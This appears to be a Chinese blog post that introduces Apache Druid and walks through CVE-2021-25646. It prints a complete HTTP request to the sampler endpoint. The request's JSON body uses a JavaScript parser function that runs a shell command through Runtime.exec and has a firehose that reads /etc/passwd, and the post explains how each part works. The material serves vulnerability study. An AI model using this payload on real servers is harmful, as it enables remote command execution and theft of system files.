当前位置: 首页 > news >正文

详细介绍:Apache Druid

目录

什么?就是Apache Druid

CVE-2021-25646(Apache Druid代码执行漏洞)


Apache Druid是什么?

        Apache Druid是一个高性能、分布式的数据存储和分析系统。设计用于处理大量实时数据,并进行低延迟的查询。它特别适合用于分析大规模日志、事件数据和时间序列函数数据。Druid支持快速聚合查询,并能够在数秒钟内处理百万条数据。通常用于构建实时数据分析平台,广泛应用于金融,广告、loT等领域。

Druid的特点包括;

Druid核心应用场景包括实时数据分析、BI、仪表盘以及事件流分析。 

CVE-2021-25646(Apache Druid代码执行漏洞)

漏洞成因:Apache Druid包括执行嵌入在各种请求中的用户提供的JavaScript代码的能力。该功能是为了在可信环境下,并且默认是禁用得。但是在Druid 0.20.0及以前版本,攻击者通过发送一个恶意请求是Druid用内置引擎执行任意的JavaScript代码,且服务器配置无效。

具体原理:https://mp.weixin.qq.com/s/McAoLfyf_tgFIfGTAoRCiw

步骤1:构造恶意数据包发送

POST /druid/indexer/v1/sampler HTTP/1.1Host: your-ip:8888Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36Connection: closeCache-Control: max-age=0Content-Type: application/json {    "type":"index",    "spec":{        "ioConfig":{            "type":"index",            "firehose":{                "type":"local",                "baseDir":"/etc",                "filter":"passwd"            }        },        "dataSchema":{            "dataSource":"test",            "parser":{                "parseSpec":{                "format":"javascript",                "timestampSpec":{                 },                "dimensionsSpec":{                 },                "function":"function(){var a = new java.util.Scanner(java.lang.Runtime.getRuntime().exec([\"sh\",\"-c\",\"id\"]).getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:123123,test: a}}",                "":{                    "enabled":"true"                }                }            }        }    },    "samplerConfig":{        "numRows":10    }}
  1. 漏洞利用点
  • 通过/druid/indexer/v1/sampler接口发送恶意JSON数据
  • firehose配置尝试读取系统敏感文件/etc/passwd
  • JavaScript解析器中的function字段包含恶意代码,通过Runtime.getRuntime().exec()执行系统命令"id"
  1. 攻击特征
  • 使用java.util.ScannerRuntime.getRuntime()实现命令注入
  • 通过useDelimiter("\\A").next()获取命令执行结果
  • 伪造正常数据结构包含timestampSpec等字段进行伪装

步骤2:查看结果

 

http://www.jsqmd.com/news/9626/

相关文章:

  • PCoT: Persuasion-Augmented Chain of Thought for Detecting Fake News and Social Media Disinformation
  • 实验1 c语言
  • 宏定义中,为什么使用:do{}while(0)这种模式是最安全的
  • 20251007J赛合订本
  • XML 元素:基础、应用与优化 - 教程
  • 深入解析:SpringBatch+Mysql+hanlp简版智能搜索
  • Cisco vManage漏洞分析:未授权RCE与权限提升完整攻击链
  • QBXT2025S刷题 Day6题
  • 硅芯片创新如何成为云计算成功的关键
  • 东萍象棋 DhtmlXQ UBB 转 中国象棋云库查询 FEN
  • 【开源工具】基于PyQt5工作时长计算器工具开发全解析 - 教程
  • 十六、【前端强化篇】完善 TestCase 编辑器:支持 API 结构化定义与断言安装
  • 斑马ZT210碳带及纸张安装教程
  • DHCP及DNS
  • Gitlab Runner 学习
  • AI元人文:论价值原语博弈与人文知识库共建如何重塑智能社会的决策基石
  • TypeScript装饰器 - Ref
  • 【笔记】排列与组合学习笔记
  • 【高级数据结构】线段树
  • 【高级数据结构】ST 表
  • 【高级算法】树形DP
  • 【高级数据结构】浅谈最短路
  • 代码随想录打卡|Day53 图论(Floyd 算法精讲 、A * 算法精讲 (A star算法)、最短路算法总结篇、图论总结 ) - 实践
  • C++_基础
  • 2025电位仪厂家最新企业品牌推荐排行榜,纳米粒度及 Zeta 电位仪,Zeta 电位仪公司推荐
  • PCIe扫盲——物理层逻辑部分基础(二)
  • 前沿仿真未来趋势
  • StarRocks与Apache Iceberg:构建高效湖仓一体的实时分析平台 - 详解
  • expr命令全解
  • 斑马打印机打印头更换教程